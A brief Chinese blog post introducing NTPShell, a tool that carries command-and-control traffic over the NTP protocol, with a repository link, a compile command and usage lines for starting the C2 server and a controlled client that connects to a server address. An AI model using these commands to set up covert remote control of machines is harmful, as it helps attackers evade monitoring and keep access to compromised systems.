NTPShell

NTPShell

获取地址https://github.com/aplyc1a/NTPShell

通过NTP协议来负载C2数据。

编译

gcc ntp.c -lpthread -o ntp

使用

c2服务端:./ntp -S
c2被控端:./ntp -C -s {server_addr}
posted @ 2024-10-09 18:45  ZapcoMan  阅读(8)  评论(0编辑  收藏  举报